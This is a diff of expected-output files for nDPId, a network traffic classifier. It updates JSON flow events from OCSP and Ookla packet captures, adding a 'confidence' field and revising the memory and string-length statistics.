+00823{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":161,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623226796047,"flow_last_seen":1623226796057,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":387,"flow_tot_l4_payload_len":387,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1623226796057,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"93.184.220.29","src_port":47904,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"ocsp.digicert.com","url":"ocsp.digicert.com\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}}
+00672{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":208,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1623226796047,"flow_last_seen":1623226963037,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":799,"flow_tot_l4_payload_len":3558,"flow_avg_l4_payload_len":71,"midstream":0,"ts_msec":1623227471703,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"93.184.220.29","src_port":47904,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}}
 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":208,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623227471703,"flow_last_seen":1623227471703,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1623227471703,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.85.15.92","src_port":49382,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00541{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":208,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1623227471703,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"ts_msec":1623227471703,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8CDlAAEAGLKrAqAGANFUPXMDmAFDpM3mLAAAAAKAC+vAljwAAAgQFtAQCCArD2jnWAAAAAAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAU0JsT"}
 00544{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":209,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1623227471715,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"ts_msec":1623227471715,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8PJoAAPMGhUg0VQ9cwKgBgABQwOYt\/4+26TN5jKAS\/\/9VQwAAAgQFoAQCCAoCPQtLw9o51gEDAwkZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAABrMGLg"}
 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1623227471719,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"ts_msec":1623227471719,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0CDpAAEAGLLHAqAGANFUPXMDmAFDpM3mMLf+Pt4AQAfaB9gAAAQEICsPaOecCPQtLGYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYY2fOA=="}
-00813{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":211,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623227471703,"flow_last_seen":1623227471719,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":396,"flow_tot_l4_payload_len":396,"flow_avg_l4_payload_len":99,"midstream":0,"ts_msec":1623227471719,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.85.15.92","src_port":49382,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"ocsp.sca1b.amazontrust.com","url":"ocsp.sca1b.amazontrust.com\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}}
+00839{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":211,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623227471703,"flow_last_seen":1623227471719,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":396,"flow_tot_l4_payload_len":396,"flow_avg_l4_payload_len":99,"midstream":0,"ts_msec":1623227471719,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.85.15.92","src_port":49382,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"ocsp.sca1b.amazontrust.com","url":"ocsp.sca1b.amazontrust.com\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":215,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623227472211,"flow_last_seen":1623227472211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1623227472211,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.2.133","src_port":59922,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00541{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":215,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1623227472211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"ts_msec":1623227472211,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8cDxAAEAGbm3AqAGAl2UCheoSAFClxR9VAAAAAKAC+vA6IAAAAgQFtAQCCApcSasVAAAAAAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAbRut"}
 00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1623227472214,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"ts_msec":1623227472214,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADYG6KmXZQKFwKgBgABQ6hJzFOMDpcUfVqAS\/\/9zqQAAAgQFTAQCCAoCSmlaXEmrFQEDAwkZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkey68"}
 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1623227472218,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"ts_msec":1623227472218,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0cD1AAEAGbnTAqAGAl2UCheoSAFClxR9WcxTjBIAQAfagEQAAAQEIClxJqx0CSmlaGYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyyO91A=="}
-00818{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":218,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623227472211,"flow_last_seen":1623227472219,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":401,"flow_tot_l4_payload_len":401,"flow_avg_l4_payload_len":100,"midstream":0,"ts_msec":1623227472219,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.2.133","src_port":59922,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"ocsp.globalsign.com","url":"ocsp.globalsign.com\/gsrsaovsslca2018","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}}
-00647{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":275,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1623227472211,"flow_last_seen":1623227587356,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1344,"flow_tot_l4_payload_len":2399,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1623229632695,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.2.133","src_port":59922,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}}
-00645{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":275,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1623227471703,"flow_last_seen":1623227587366,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1006,"flow_tot_l4_payload_len":1402,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1623229632695,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.85.15.92","src_port":49382,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}}
+00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":218,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623227472211,"flow_last_seen":1623227472219,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":401,"flow_tot_l4_payload_len":401,"flow_avg_l4_payload_len":100,"midstream":0,"ts_msec":1623227472219,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.2.133","src_port":59922,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"ocsp.globalsign.com","url":"ocsp.globalsign.com\/gsrsaovsslca2018","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}}
+00673{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":275,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1623227472211,"flow_last_seen":1623227587356,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1344,"flow_tot_l4_payload_len":2399,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1623229632695,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.2.133","src_port":59922,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}}
+00671{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":275,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1623227471703,"flow_last_seen":1623227587366,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1006,"flow_tot_l4_payload_len":1402,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1623229632695,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.85.15.92","src_port":49382,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":275,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623229632695,"flow_last_seen":1623229632695,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1623229632695,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"109.70.240.114","src_port":45514,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00541{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":275,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1623229632695,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"ts_msec":1623229632695,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA82G5AAEAGQmzAqAGAbUbwcrHKAFDtwUNWAAAAAKAC+vAcMQAAAgQFtAQCCAoRKRyhAAAAAAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAADZRLNb"}
 00541{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":276,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1623229632706,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"ts_msec":1623229632706,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADUGJdttRvBywKgBgABQscrfcozQ7cFDV6AScSAwDQAAAgQFtAQCCAq9uUvmESkcoQEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAADSBFoQ"}
 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":277,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1623229632711,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"ts_msec":1623229632711,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA02G9AAEAGQnPAqAGAbUbwcrHKAFDtwUNX33KM0YAQAfbN9AAAAQEIChEpHLC9uUvmGYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0EjACA=="}
-00811{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":278,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623229632695,"flow_last_seen":1623229632711,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":399,"flow_tot_l4_payload_len":399,"flow_avg_l4_payload_len":99,"midstream":0,"ts_msec":1623229632711,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"109.70.240.114","src_port":45514,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"ocsp09.actalis.it","url":"ocsp09.actalis.it\/VA\/AUTHOV-G3","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}}
-00649{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1623229632695,"flow_last_seen":1623229697742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":2724,"flow_avg_l4_payload_len":113,"midstream":0,"ts_msec":1623229850956,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"109.70.240.114","src_port":45514,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}}
+00837{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":278,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623229632695,"flow_last_seen":1623229632711,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":399,"flow_tot_l4_payload_len":399,"flow_avg_l4_payload_len":99,"midstream":0,"ts_msec":1623229632711,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"109.70.240.114","src_port":45514,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"ocsp09.actalis.it","url":"ocsp09.actalis.it\/VA\/AUTHOV-G3","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}}
+00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1623229632695,"flow_last_seen":1623229697742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":2724,"flow_avg_l4_payload_len":113,"midstream":0,"ts_msec":1623229850956,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"109.70.240.114","src_port":45514,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":299,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623229850956,"flow_last_seen":1623229850956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1623229850956,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.12.96.145","src_port":49034,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00542{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":299,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1623229850956,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"ts_msec":1623229850956,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8+shAAEAGBi7AqAGAFwxgkb+KAFDAJRPhAAAAAKAC+vCvFgAAAgQFtAQCCAqOHkIzAAAAAAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAACxCLhj"}
 00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1623229850968,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"ts_msec":1623229850968,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADgGCPcXDGCRwKgBgABQv4rZVTUewCUT4qAS\/ohT3AAAAgQFtAQCCAoG1UJIjh5CMwEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAABvS4I1"}
 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":301,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1623229850972,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"ts_msec":1623229850972,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0+slAAEAGBjXAqAGAFwxgkb+KAFDAJRPi2VU1H4AQAfZ\/KgAAAQEICo4eQkQG1UJIGYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAV7trsA=="}
-00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":302,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623229850956,"flow_last_seen":1623229850973,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":386,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1623229850973,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.12.96.145","src_port":49034,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"ocsp.entrust.net","url":"ocsp.entrust.net\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}}
-00648{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":344,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":46,"flow_first_seen":1623229850956,"flow_last_seen":1623229968257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":7031,"flow_avg_l4_payload_len":152,"midstream":0,"ts_msec":1623229968257,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.12.96.145","src_port":49034,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}}
+00821{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":302,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623229850956,"flow_last_seen":1623229850973,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":386,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1623229850973,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.12.96.145","src_port":49034,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"ocsp.entrust.net","url":"ocsp.entrust.net\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}}
+00674{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":344,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":46,"flow_first_seen":1623229850956,"flow_last_seen":1623229968257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":7031,"flow_avg_l4_payload_len":152,"midstream":0,"ts_msec":1623229968257,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.12.96.145","src_port":49034,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}}
 00156{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":344,"source":"ocsp.pcapng","alias":"nDPId-test","total-events-serialized":62}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 344/344
@@ -68,10 +68,10 @@
 ~~ total active/idle flows...: 10/10
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4617237 bytes
-~~ total memory freed........: 4617237 bytes
-~~ total allocations/frees...: 99972/99972
+~~ total memory allocated....: 4699238 bytes
+~~ total memory freed........: 4699238 bytes
+~~ total allocations/frees...: 101562/101562
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 161 chars
-~~ json string max len.......: 875 chars
-~~ json string avg len.......: 588 chars
+~~ json string max len.......: 901 chars
+~~ json string avg len.......: 601 chars
diff --git a/test/results/ookla.pcap.out b/test/results/ookla.pcap.out
index c2e039301..e5d52bc16 100644
--- a/test/results/ookla.pcap.out
+++ b/test/results/ookla.pcap.out
@@ -3,13 +3,13 @@
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ookla.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1491069108756,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1491069108756,"pkt":"gCqojWksxCwDBkn+CABFAABAClpAAEAGAADAqAEHLiz9u8gHAFAHQx4AAAAAALAC\/\/\/tyQAAAgQFtAEDAwUBAQgKDd4HoAAAAAAEAgAA"}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ookla.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1491069108793,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1491069108793,"pkt":"xCwDBkn+gCqojWksCABFAAA8AABAADMGWiUuLP27wKgBBwBQyAdRUNK1B0MeAaASOJAJ5wAAAgQFrAQCCAp\/4XDqDd4HoAEDAwU="}
 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ookla.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1491069108793,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1491069108793,"pkt":"gCqojWksxCwDBkn+CABFAAA0s5FAAEAGAADAqAEHLiz9u8gHAFAHQx4BUVDStoAQECztvQAAAQEICg3eB8R\/4XDq"}
-00613{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ookla.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1491069108756,"flow_last_seen":1491069108794,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":342,"flow_tot_l4_payload_len":342,"flow_avg_l4_payload_len":85,"midstream":0,"ts_msec":1491069108794,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"46.44.253.187","src_port":51207,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.Ookla","breed":"Safe","category":"Network"},"http": {}}
